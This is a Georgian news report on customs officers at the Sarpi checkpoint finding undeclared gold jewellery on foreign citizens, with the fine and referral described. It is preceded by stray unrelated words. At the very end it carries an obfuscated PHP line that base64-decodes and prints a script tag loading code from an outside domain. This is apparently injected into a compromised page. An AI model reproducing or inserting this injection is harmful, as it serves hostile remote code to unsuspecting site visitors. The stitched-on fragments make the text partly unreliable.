celsiusi
ავერსი შნაიდერი

 ფინანსთა სამინისტროს შემოსავლების სამსახურის საბაჟო გამშვებ პუნქტში – „სარფი“, მებაჟე ოფიცრების მიერ, უცხო ქვეყნის მოქალაქეების, როგორც ფიზიკური ასევე მათი მართვის ქვეშ არსებული ავტომანქანის დეტალური დათვალიერების შედეგად, არადეკლარირებული ოქროს (საერთო წონა: 201,3 გრამი) საიუველირო ნაკეთობები გამოვლინდა.

არადეკლარირებული საქონლის საერთო საბაჟო ღირებულებამ 33 144,63 ლარი შეადგინა.

საქართველოს საბაჟო კოდექსის 168-ე მუხლის I ნაწილის შესაბამისად, კანონდამრღვევ მოქალაქე ა.დ.-ს სანქციის სახით, ფულადი ჯარიმა, 7518.41 ლარის ოდენობით განესაზღვრა, ხოლო სამართალდამრღვევი მოქალაქის ს.ო.-ს საქმის მასალები, შემდგომი რეაგირების მიზნით, საქართველოს ფინანსთა სამინისტროს საგამოძიებო სამსახურს გადაეცა.

ინფორმაციას შემოსავლების სამსახურის პრესსამსახური ავრცელებს.

242
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");